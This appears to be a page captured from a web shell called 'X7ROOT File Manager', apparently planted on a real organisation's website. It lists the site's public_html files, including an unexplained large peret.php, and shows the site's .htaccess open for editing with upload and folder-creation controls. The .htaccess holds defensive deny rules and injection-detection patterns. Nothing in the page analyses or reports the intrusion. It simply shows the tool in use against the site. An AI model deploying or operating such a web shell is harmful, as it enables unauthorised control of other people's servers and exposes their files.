X7ROOT File Manager
Current Path:
/home/u126090504/domains/bpcaodisha.com/public_html
home
/
u126090504
/
domains
/
bpcaodisha.com
/
public_html
/
📁
..
📄
.htaccess
(1.12 KB)
📁
.well-known
📄
about-bpca.php
(3.26 KB)
📁
admin
📁
ajax-load
📁
bpca
📄
bpca.zip
(15.2 MB)
📄
contact-us.php
(4.06 KB)
📄
contactdb.php
(796 B)
📄
courses.php
(10.76 KB)
📁
css
📄
facilities.php
(10.91 KB)
📄
faculty.php
(2.89 KB)
📁
fonts
📄
footer.php
(6.43 KB)
📄
gallery.php
(2.96 KB)
📄
header.php
(6.37 KB)
📁
images
📄
index.php
(14.62 KB)
📁
js
📄
message.php
(3.09 KB)
📄
peret.php
(266.87 KB)
📄
readme.html
(199 B)
📄
robots.txt
(31 B)
📄
scope.php
(28.59 KB)
📄
syllabus.php
(2.1 KB)
📄
tap.jpg
(75.17 KB)
Editing: .htaccess
# 1. Directory Browsing ko Disable karein # Isse hackers aapki files ki list nahi dekh paayenge Options -Indexes # 2. Sensitive Files tak access block karein <FilesMatch "^(\.htaccess|\.htpasswd|config\.php|wp-config\.php|php\.ini)"> Order deny,allow Deny from all </FilesMatch> # 3. SQL Injection aur Script Injection se bachao RewriteEngine On RewriteCond %{QUERY_STRING} (<|%3C).*script.*(>|%3E) [NC,OR] RewriteCond %{QUERY_STRING} GLOBALS(=|\[|\%[0-9A-Z]{0,2}) [OR] RewriteCond %{QUERY_STRING} _REQUEST(=|\[|\%[0-9A-Z]{0,2}) RewriteRule ^(.*)$ index.php [F,L] # 4. XSS (Cross Site Scripting) aur Clickjacking Protection <IfModule mod_headers.c> Header set X-XSS-Protection "1; mode=block" Header set X-Frame-Options "SAMEORIGIN" Header set X-Content-Type-Options "nosniff" Header set Referrer-Policy "strict-origin-when-cross-origin" </IfModule> # 5. Image Hotlinking rokne ke liye (Taaki koi aur apki images use karke aapka bandwidth na churaye) RewriteCond %{HTTP_REFERER} !^$ RewriteCond %{HTTP_REFERER} !^http(s)?://(www\.)?bpcaodisha.com [NC] RewriteRule \.(jpg|jpeg|png|gif)$ - [F]
Upload File
Create Folder
